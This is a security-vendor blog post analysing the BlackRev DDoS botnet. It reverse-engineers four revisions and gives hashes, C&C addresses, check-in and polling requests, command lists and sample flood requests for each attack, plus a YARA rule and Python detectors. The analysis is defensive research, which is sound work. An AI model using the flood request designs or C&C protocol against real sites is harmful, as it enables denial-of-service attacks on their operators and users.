The Latest in IT Security

The Revolution Will Be Written in Delphi

21 May 2013

Since it has been a little while since we profiled a DDoS botnet family on the blog, let’s take a look at Trojan.BlackRev (also known as the “Black Revolution” trojan). It was named for the mutex set in early versions of the malware. This family is interesting from a research perspective because there are at least four revisions in the wild showing its progression from a basic DDoS bot to a more advanced one.

Revision  MD5                               C&C URL                              C&C IP
1         06d8da1e14cff81ca2fad02d2a878c72  http://userhaos.ru/113/bot/gate.php  91.105.232.105
2         c9c6aeacee9f973ca0ca5da101a12a16  http://ergoholding.ru/rev/gate.php   91.204.122.100
2.5       7141cacc3f4a191015a176947a403b79  http://clfrev.ru/rev/panel/gate.php  93.170.130.112
3         eae553d72142f9dcb06c5c134015fe7a  http://ergoholding.ru/ddd/gate.php   91.204.122.100

The programming language used is Delphi (networking support via the Synapse library). PEiD detects it as version “6.0 – 7.0” and the Interactive Delphi Reconstructor (IDR) confirms version 7.

As an aside, the latter tool’s IDC Generator helped significantly in reverse engineering these binaries in IDA Pro, thanks much!

Based on the Delphi usage, command and control locations, and the language references in some of the HTTP headers, the nationality of this family is empirically Russian. But, as with all malware attribution, this is highly speculative. It is also unclear whether a single threat actor has access to the source code or whether the code has been released or leaked and multiple actors are making modifications.

Revision 1

Revision 1’s command and control (C&C) is HTTP based. Bots register to the C&C using a request like this:

GET /113/bot/gate.php?reg=lemaaapuzg HTTP/1.0
Host: userhaos.ru
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

The reg parameter value is set to 10 random lowercase letters.

Here is how bots poll for commands:

GET /113/bot/gate.php?cmd=urls HTTP/1.0
Host: userhaos.ru
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

The C&C will respond with a “|” delimited message:

command|unknown_integer|unknown_integer2|target|query string or port|

Identified commands:

  • stop – stop attack
  • die – terminate bot process
  • sleep – sleep for one hour
  • http – HTTP GET request flood #1
  • simple – HTTP GET request flood #2
  • loginpost – HTTP POST request flood #1
  • datapost – HTTP POST request flood #2

The following DDoS attacks are implemented in this revision.

Attack – http

A HTTP GET request flood. Here is a sample request:

GET /index.html HTTP/1.1
Host: victim.com
Keep-Alive: 266
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.172 Safari/537.22
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.3
Referer: http://victim.com/
Cookie: PHPSESSID=t0gmf00id9bp4j9gvfsq87kq22; hotlog=1; __utma=226332163.1894789553.1362397126.1362926988.1363866277.4; __utmb=226332163.1.10.1363866277; __utmc=226332163; __utmz=226332163.1362397126.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

The Keep-Alive header will be set to a random integer between 0 and 300. The rest of the headers are static.

Attack – simple

A barebones HTTP GET request flood. It uses Synapse’s default GET request and looks like this:

GET /index.html HTTP/1.1
Host: victim.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

Attack – loginpost

A HTTP POST request flood. The POST request will look like:

POST /index.html HTTP/1.0
Host: victim.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)
Content-Type: text/html
Content-Length: 25

login=gxt1$pass=svw3re1aq

The login and pass parameters are separated by the “$”. Both values are set to random lowercase letters and digits. The lengths will be chosen randomly between 0 and 15 characters each.

Attack – datapost

A HTTP POST request flood. A sample request:

POST /index.html HTTP/1.0
Host: victim.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)
Content-Type: text/html
Content-Length: 895

r8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs

jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs

jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs

jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs

jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs

jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs

jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs

jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs

jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs

jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs

jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsj

For the POST data, a string of lowercase letters and digits is generated. The length will be randomly chosen between 0 and 150. This string will then be repeated 179 times.

Revision 2

Revision 2 of Trojan.BlackRev modifies the C&C communications slightly. The reg parameter is set to 15 random lower and uppercase letters and it uses the following User-Agent:

User-Agent: Mozilla/4.0 (SEObot)

The following layer 4 attack commands were added:

  • syn – TCP connection flood
  • udp – UDP flood #1
  • udpdata – UDP flood #2
  • data – TCP flood
  • icmp – ICMP echo request floods

This revision implements revision 1’s http, simple, loginpost, and datapost attacks with the only difference being that in the latter three, the User-Agent used is:

User-Agent: Mozilla/4.0 (SEObot)

The following are the details of the additional DDoS attacks.

Attack – syn

Per the name, this is supposed to be a TCP SYN flood, but behind the scenes a TCP connection flood is implemented, with a complete 3-way handshake.

Attack – udp

A UDP flood where the payload is 16 “F”s.

Attack – udpdata

A UDP flood where the payload is 100 random lowercase letters.

Attack – data 

A TCP flood. For the payload, a string of random lowercase letters with a random length of 0 to 100 is generated. This string is repeated 172 times. The concatenated string is then repeated again 35 times.

Attack – icmp

An ICMP echo request or Ping flood. The payload is 44 “7”s.

Revision 2.5

C&C-wise, revision 2.5 is very similar to revision 2. It changes the following commands:

  • http
  • udp
  • udpdata
  • data

This revision adds:

  • tcpdata – TCP flood #1
  • dataget – HTTP GET request flood
  • connect – TCP flood #2
  • dns – resolve IPs

Attack – http

Example request:

GET /index1.html HTTP/1.1
Host: www.victim1.com
Keep-Alive: 176
Connection: keep-alive
User-Agent: Android-x86-1.6-r2 – Mozilla/5.0 (Linux; U; Android 1.6; en-us; eeepc Build/Donut) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.3
Referer: https://www.google.ru/#hl=ru&gs_rn=9&gs_ri=psy-ab&tok=TBFEIC6g9ZD8TLHI_O_qEw&cp= 5&gs_id=i&xhr=t&q=www.victim1.com&es_nrs=true&pf=p&newwindow=1&safe=off&output=search&sclient=psy-ab&oq=site.&gs_l=&pbx=1&bav=on.2,or.r_cp.r_qf. &bvm=bv.45175338,d.bGE&fp=364d6440e7471a0b&biw=1360&bih=624
Cookie: PHPSESSID=66lf4vv9l8W7engCw6hFmLWShuKAMMuqJICAxiLekLrmAnnmiJ

The Keep-Alive header will be set to a random number between 0 and 300. The Cookie header will be set to “PHPSESSID=” followed by 50 random uppercase letters, lowercase letters, and digits. This revision selects a random User-Agent from the following 11 possibilities:

  • Yandex/1.01.001 (compatible; Win16; I)
  • Yandex/1.01.001 (compatible; Win16; P)
  • Yandex/1.02.000 (compatible; Win16; F)
  • Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
  • Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)
  • StackRambler/2.0 (MSIE incompatible)
  • StackRambler/2.0
  • Android-x86-1.6-r2 – Mozilla/5.0 (Linux; U; Android 1.6; en-us; eeepc Build/Donut) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2
  • Samsung Galaxy S – Mozilla/5.0 (Linux; U; Android 2.1-update1; ru-ru; GT-I9000 Build/ECLAIR) AppleWebKit/530.17 (KHTML, like Gecko)
  • Samsung Galaxy Tab 10.1 Android 3.1 – Mozilla/5.0 (Linux; U; Android 3.1; en-us; GT-P7510 Build/HMJ37) AppleWebKit/534.13 (KHTML, like Gecko)
  • Blackberry OS ?? 4.2 ?? 5 ?????? ? BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179

The rest of the headers are static, including the very specific Referer.

Attack – udp

The UDP payload is interesting. It is 76 bytes in length, and looks like tcpdump output:

[udp sum ok] 60865 FormErr% [0q] 0/0/0 (12) (DF) (ttl 253, id 9987, len 40)

ASERT team member Matt Bing speculated that it might have been copied and pasted from the tcpdump output in this 2005 article on “Understanding the UDP Protocol”.

Attack – udpdata

The payload in this variant is 342 “F”s.

Attack – tcpdata

This is a new attack, a TCP flood. The payload is generated like this: a string of 100 random lowercase letters is generated. This string is repeated 172 times. Then, the concatenated string is repeated 35 times.
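The datapost, data and tcpdata payloads described above are all one short random unit repeated a fixed number of times, which a sensor can test for directly. The following is an added example, not ASERT's code: it finds the shortest repeating unit of a payload and compares the repeat count, unit length and alphabet with the values stated in the text. Function names and sample payloads are constructed for illustration, and for the TCP floods the input is assumed to be the reassembled stream payload.

```python
import re

def smallest_period(data: bytes) -> int:
    """Length of the shortest unit whose repetition equals data (len(data) if none)."""
    n = len(data)
    if n == 0:
        return 0
    fail = [0] * n                     # KMP prefix function
    k = 0
    for i in range(1, n):
        while k and data[i] != data[k]:
            k = fail[k - 1]
        if data[i] == data[k]:
            k += 1
        fail[i] = k
    p = n - fail[-1]
    return p if n % p == 0 else n

# (label, repeat count, longest unit, unit alphabet), all taken from the text above.
SIGNATURES = [
    ("datapost body", 179, 150, re.compile(rb"[a-z0-9]+")),
    ("data/tcpdata payload", 172 * 35, 100, re.compile(rb"[a-z]+")),
]

def match_repeat_flood(payload: bytes):
    """Return the label of the matching repeated-unit payload, or None."""
    p = smallest_period(payload)
    if p == 0:
        return None                    # empty payload (zero-length unit): nothing to match
    count = len(payload) // p
    for label, repeats, max_unit, alphabet in SIGNATURES:
        # A random unit can itself be periodic ("abab"), so the observed count
        # is a multiple of the stated repeat count, not always equal to it.
        if (count % repeats == 0 and len(payload) // repeats <= max_unit
                and alphabet.fullmatch(payload[:p])):
            return label
    return None

# Constructed payloads; the first uses the unit seen in the datapost sample request.
SAMPLES = {
    "datapost sample": b"r8vsj" * 179,
    "periodic unit": b"abab" * 179,
    "tcp data": b"qzk" * 172 * 35,
    "ordinary form post": b"username=alice&comment=hello",
    "empty": b"",
}

if __name__ == "__main__":
    for name, payload in SAMPLES.items():
        print(f"{name:20} {len(payload):6d} bytes -> {match_repeat_flood(payload)}")
```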

Attack – data 

The data command was changed to launch both the udpdata and tcpdata attacks.

Attack – dns 

Repeatedly tries to resolve the target IP via gethostbyaddr() function calls.

Attack – dataget 

A new HTTP GET request flood. Example request:

GET /index10.html?xf29jgj0jwnpl7ivtp4gkrelbj6dm4qsg7x62x7c3u17k9mrpd6k8bgwcpmdrhykhyi8fhcxj5ry0jbwjgo1tqb7645m9ix27jk9dx1lgq9uj89dme0fp8b0wrknmnk9yieybrhpsd005s5hpwerv1=xf29jgj0jwnpl7ivtp4gkrelbj6dm4qsg7x62x7c3u17k9mrpd6k8bgwcpmdrhykhyi8fhcxj5ry0jbwjgo1tqb7645m9ix27jk9dx1lgq9uj89dme0fp8b0wrknmnk9yieybrhpsd005s5hpwerv1$….more of the same… HTTP/1.1
Host: www.victim10.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (SEObot)

The query string is quite long; it is constructed like this: a string of 150 random lowercase letters and digits is generated. This string is used for 18 name/value pairs. At the end, an additional name/value pair is added where the value is the random string repeated 53 times. Each name/value pair is separated by a “$”.

Attack – connect 

A new attack, a TCP flood. On each send() iteration a string of 10 random lowercase letters is generated and appended to the previously generated string. A newline is concatenated to the end.

Revision 3

Revision 3 changes things up a bit. The analyzed binary phones home to the same C&C domain and IP as revision 2, but bot registration now looks like this:

GET /ddd/gate.php?id=idbucwehjhhgjjxxe HTTP/1.0
Host: ergoholding.ru
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

The id parameter will be set to “id” plus 15 random lowercase letters.

Commands in this revision are polled via:

GET /ddd/get HTTP/1.0
Host: ergoholding.ru
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

The C&C response is still pipe delimited, but different:

command|number_of_packets_to_send|URL, IP, hostname, or stop
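The registration and polling requests described for each revision are regular enough to match in proxy logs. The following is an added example, not ASERT's code: it classifies a logged request as a BlackRev check-in by revision and parses both pipe-delimited response layouts. The function names, the (request target, User-Agent) record layout and the sample records are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

SYNAPSE_UA = "Mozilla/4.0 (compatible; Synapse)"   # revisions 1 and 3
SEOBOT_UA = "Mozilla/4.0 (SEObot)"                 # revisions 2 and 2.5

def classify_checkin(request_target, user_agent):
    """Return (revision, kind) if the request matches a described check-in, else None."""
    parts = urlsplit(request_target)
    qs = parse_qs(parts.query)
    reg = qs.get("reg", [""])[0]
    bot_id = qs.get("id", [""])[0]
    if parts.path.endswith("/gate.php"):
        if user_agent == SYNAPSE_UA:
            if re.fullmatch(r"[a-z]{10}", reg):
                return ("1", "register")
            if re.fullmatch(r"id[a-z]{15}", bot_id):
                return ("3", "register")
            if qs.get("cmd") == ["urls"]:
                return ("1", "poll")
        elif user_agent == SEOBOT_UA:
            if re.fullmatch(r"[A-Za-z]{15}", reg):
                return ("2.x", "register")
            if qs.get("cmd") == ["urls"]:   # assumption: 2.x keeps revision 1's poll
                return ("2.x", "poll")
    elif parts.path.endswith("/get") and not parts.query and user_agent == SYNAPSE_UA:
        return ("3", "poll")
    return None

def parse_tasking(body):
    """Parse a pipe-delimited C&C response into a dict; None if it fits neither layout."""
    fields = body.strip().split("|")
    if len(fields) == 6 and fields[5] == "":
        # Revision 1 layout: command|unknown_integer|unknown_integer2|target|query string or port|
        return {"layout": "rev1", "command": fields[0], "unknown": fields[1:3],
                "target": fields[3], "extra": fields[4]}
    if len(fields) == 3 and fields[1].isdigit():
        # Revision 3 layout: command|number_of_packets_to_send|URL, IP, hostname, or stop
        return {"layout": "rev3", "command": fields[0],
                "packets": int(fields[1]), "target": fields[2]}
    return None

# Constructed proxy-log records (request target, User-Agent), modelled on the requests above.
SAMPLE_LOG = [
    ("/113/bot/gate.php?reg=lemaaapuzg", SYNAPSE_UA),
    ("/113/bot/gate.php?cmd=urls", SYNAPSE_UA),
    ("/rev/gate.php?reg=QwErTyUiOpAsDfG", SEOBOT_UA),    # constructed reg value
    ("/ddd/gate.php?id=idbucwehjhhgjjxxe", SYNAPSE_UA),
    ("/ddd/get", SYNAPSE_UA),
    ("/index.html", SYNAPSE_UA),                          # unrelated Synapse client
]

if __name__ == "__main__":
    for target, ua in SAMPLE_LOG:
        print(target, "->", classify_checkin(target, ua))
    # Constructed responses; the integer fields are placeholders.
    print(parse_tasking("http|1|2|www.example.com|/index.html|"))
    print(parse_tasking("range|500|http://www.example.com/index.html"))
```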

There are some deletions, additions, and changes to the command set.

Commands removed:

  • die
  • sleep
  • syn
  • udpdata
  • tcpdata
  • data
  • dataget
  • connect

Commands added:

  • exec – download and execute
  • resolve – hostname resolution flood
  • antiddos – HTTP GET request flood – favicon.ico
  • range – HTTP GET request flood – Range header
  • ftp – FTP connection flood
  • download – HTTP GET request flood
  • fastddos – HTTP GET request flood – WinInet functions
  • slowhttp – HTTP GET request flood – possible Slowloris attempt
  • allhttp – launches multiple HTTP floods
  • full – launches multiple floods

Commands changed:

  • http
  • simple
  • loginpost
  • datapost
  • udp

Commands that stayed the same:

  • icmp
  • dns

Below are revision 3’s attacks.

Attack – http

The http attack changed. It is now a HTTP GET and POST flood. The GET request:

GET /index.html HTTP/1.1
Host: www.victim1.com
Keep-Alive: 162
Connection: keep-alive
Cookie: s=nfa578n8ichp3eep45j22f5; PHPSESSID=qto36rucgccrlurdncrg4lsdu6; selected_language=Russian; dle_compl=0
User-Agent: Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.14
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
Referer: http://www.victim1.com/index.html

And the POST:

POST /index.html HTTP/1.1
Host: www.victim1.com
Keep-Alive: 162
Connection: keep-alive
Cookie: s=nfa578n8ichp3eep45j22f5; PHPSESSID=qto36rucgccrlurdncrg4lsdu6; selected_language=Russian; dle_compl=0
User-Agent: Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.14
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
Referer: http://www.victim1.com/index.html
Content-Length: 87664

In both, the Keep-Alive header will be set to a random number between 0 and 300. In the POST, the Content-Length header is set to a random number between 0 and 300,000.

Attack – simple

The simple attack is slightly different:

GET /index.html HTTP/1.1
Host: www.victim2.com
Connection: close
User-Agent: Opera/9.80

The User-Agent header looks to be a copy and paste typo. This User-Agent is used in some additional attacks as well.

Attack – loginpost

In addition to the below POST request, a simple flood is also started.

POST /index.html HTTP/1.1
Host: www.victim3.com
Connection: close
User-Agent: Opera/9.80
Content-Type: text/html
Content-Length: 28

login=g84lkvpk&pass=uOjzq9FJ

Slight differences: the parameters are separated by a “&” instead of a “$” and the values are each set to eight random lowercase letters and digits.

Attack – datapost

A POST request where the data is 100 random lowercase letters.

POST /index.html HTTP/1.1
Host: www.victim4.com
Connection: close
User-Agent: Opera/9.80
Content-Type: text/html
Content-Length: 100

bulwmxcytltvczbrgqoedffycczkyedrmoczlkhgjghmwdnveinkkzgncvtojsxhlchddzebspuwcsdeydalowdcewdxrllgzvvt

Attack – udp

The UDP flood routine no longer uses the Synapse Library in this revision. Winsock is used instead. Port 80 is hardcoded and the payload is only two “F”s.

Attack – resolve

Repeatedly tries to resolve the target hostname via gethostbyname() function calls.

Attack – antiddos 

A HTTP GET request flood. Two requests are sent on each iteration, the first one being:

GET /index.html HTTP/1.1
Host: www.victim2.com
Keep-Alive: 150
Connection: keep-alive
Cookie: s=nfa578n8ichp3eep45j22f5; PHPSESSID=qto36rucgccrlurdncrg4lsdu6; selected_language=Russian; dle_compl=0
User-Agent: Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.14
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
Referer: http://www.victim2.com/index.html

The second:

GET /index.html/favicon.ico HTTP/1.1
Host: www.victim2.com
Keep-Alive: 47
Connection: keep-alive
Cookie: s=nfa578n8ichp3eep45j22f5; PHPSESSID=qto3e45h4rlurdncrg4lsdu6; selected_language=Russian; dle_compl=0
User-Agent: Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.14
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
Referer: http://www.victim2.com/index.html

The Keep-Alive header is set to a random number between 0 and 300. favicon.ico is automatically added in the second request.

Attack – range

A HTTP GET request flood with a Range header. Possibly an attempt at an ARME/Apache Killer style attack. Sample request:

GET /index.html HTTP/1.1
Host: www.victim4.com
Connection: close
Range: bytes=41-73915
User-Agent: Opera/9.80

The Range start value is a random value between 0 and 100. The stop value is a random value between 0 and 100,000.

Attack – ftp

A FTP connection flood. A sample session:

200 OK
USER 7g6jo5ircx
331 password
PASS s1pvu9yx0r
200 OK
TYPE I
200 OK
STRU F
200 OK
MODE S
200 OK
REST 0
200 OK

The USER and PASS will both be set to 10 random lowercase letters and digits. 

Attack – download

A basic HTTP GET request flood:

GET /1.exe HTTP/1.0
Host: www.victim7.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

Attack – fastddos

A HTTP GET request flood using the WinInet functions:

GET /index.html HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: google
Host: www.victim8.com
Cache-Control: no-cache

Notice the interesting User-Agent.

Attack – slowhttp

A HTTP GET request flood. Possibly an attempt at a Slowloris attack, but it is not slow at sending data. Here’s what the request looks like:

GET /9.html HTTP/1.0
Host: www.victim9.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)‘=

Attack – allhttp

Launches the following attacks:

  • simple
  • http
  • range
  • loginpost
  • download
  • datapost

Attack – full

Launches the following attacks:

  • icmp
  • udp
  • datapost
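Several of the flood requests above carry static quirks that do not occur in ordinary browser traffic, which makes them usable as filtering criteria. The following is an added example, not ASERT's code: it parses a raw HTTP request and reports which of those quirks it matches. The function names, fingerprint labels and sample requests are constructed for illustration.

```python
import re

def parse_request(raw):
    """Split a raw HTTP request into (method, target, headers, body); None if malformed."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    first = lines[0].split(" ")
    if len(first) != 3:
        return None
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return first[0], first[1], headers, body.strip()

def flood_fingerprints(raw):
    """Names of the fingerprints described above that this request matches."""
    parsed = parse_request(raw)
    if parsed is None:
        return []
    method, target, h, body = parsed
    ua = h.get("user-agent", "")
    hits = []
    if ua == "Mozilla/4.0 (SEObot)":
        hits.append("rev2.x SEObot User-Agent")
    if ua == "Opera/9.80":
        hits.append("rev3 bare Opera/9.80 User-Agent")
    if re.fullmatch(r"login=[a-z0-9]{0,15}\$pass=[a-z0-9]{0,15}", body):
        hits.append("rev1/2.x loginpost body")
    if re.fullmatch(r"PHPSESSID=[A-Za-z0-9]{50}", h.get("cookie", "")):
        hits.append("rev2.5 http cookie")
    # Assumption: favicon.ico is appended after a file name, as in the sample request.
    if re.search(r"\.\w+/favicon\.ico$", target):
        hits.append("rev3 antiddos path")
    m = re.fullmatch(r"bytes=(\d+)-(\d+)", h.get("range", ""))
    if m and ua == "Opera/9.80" and int(m[1]) <= 100 and int(m[2]) <= 100000:
        hits.append("rev3 range")
    if (method == "GET" and ua == "google"
            and h.get("content-type") == "application/x-www-form-urlencoded"):
        hits.append("rev3 fastddos")
    return hits

# Constructed requests modelled on the samples above (example.com hosts).
RANGE_REQ = ("GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nConnection: close\r\n"
             "Range: bytes=41-73915\r\nUser-Agent: Opera/9.80\r\n\r\n")
LOGINPOST_REQ = ("POST /index.html HTTP/1.0\r\nHost: www.example.com\r\n"
                 "User-Agent: Mozilla/4.0 (compatible; Synapse)\r\n"
                 "Content-Type: text/html\r\nContent-Length: 25\r\n\r\n"
                 "login=gxt1$pass=svw3re1aq")
BROWSER_REQ = ("GET /favicon.ico HTTP/1.1\r\nHost: www.example.com\r\n"
               "User-Agent: Mozilla/5.0 (X11; Linux x86_64)\r\n\r\n")

if __name__ == "__main__":
    for req in (RANGE_REQ, LOGINPOST_REQ, BROWSER_REQ):
        print(req.split("\r\n")[0], "->", flood_fingerprints(req))
```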

Miscellaneous

Besides the C&C and DDoS attacks there are some additional differences and features among the revisions:

  • All four revisions spawn a thread that tries to maintain a small memory footprint via calls to SetProcessWorkingSetSize().
  • Revisions 1 and 2.x try to revoke discretionary access control list (DACL) rights to their binary.
  • Revisions 1 and 2.x enumerate a bunch of directories and then remove files and kill processes based on some tests. The referenced analysis below indicates this might be “botkiller” code.
  • Revision 2.x verifies the embedded C&C by calculating a hash on the URL and comparing it to a hardcoded hash value.
  • Revision 2.x has some built-in monitoring/debugging functionality where the attack commands are echoed back to the C&C via a HTTP GET request to monitor.php.
  • Revision 3 was the first binary to be packed (with UPX).
  • Revision 3 maintains persistence via the Registry Run method.
  • The code organization and layout of revision 3 also differs a bit from the other three.

Most of these code paths were glossed over during reversing and a detailed analysis of them is left as an exercise for any interested readers. There is a Russian language malware analysis of revision 2 by the “onthar.in Malware Research Laboratory” that takes a closer look at some of the above and also at an associated dropper malware. It is available at http://onthar.in/articles/black-revolution-ddos-bot-analysis/ (Google Translate does an okay job.)

ASERT has been using the following YARA rule to detect this malware family in our malware zoo:

// blackrev
// Dennis Schwarz, Arbor Networks ASERT
// April 2013

rule blackrev
{
    strings:
        // attack commands present in all four revisions
        $base1 = "http"
        $base2 = "simple"
        $base3 = "loginpost"
        $base4 = "datapost"

        // strings that vary between revisions
        $opt1 = "blackrev"
        $opt2 = "stop"
        $opt3 = "die"
        $opt4 = "sleep"
        $opt5 = "syn"
        $opt6 = "udp"
        $opt7 = "udpdata"
        $opt8 = "icmp"
        $opt9 = "antiddos"
        $opt10 = "range"
        $opt11 = "fastddos"
        $opt12 = "slowhttp"
        $opt13 = "allhttp"
        $opt14 = "tcpdata"
        $opt15 = "dataget"

    condition:
        all of ($base*) and 5 of ($opt*)
}

Conclusion

As we have seen, Trojan.BlackRev is very much a DDoS-specific bot with a rich set of attacks. There are certainly signs that circa April 2013 the code was under active development and the associated campaigns were likely test runs. In addition, the onthar.in analysis notes that they haven’t seen this malware being sold on the underground forums yet. It will be interesting to see how this family will evolve and how active it will become in the wild.
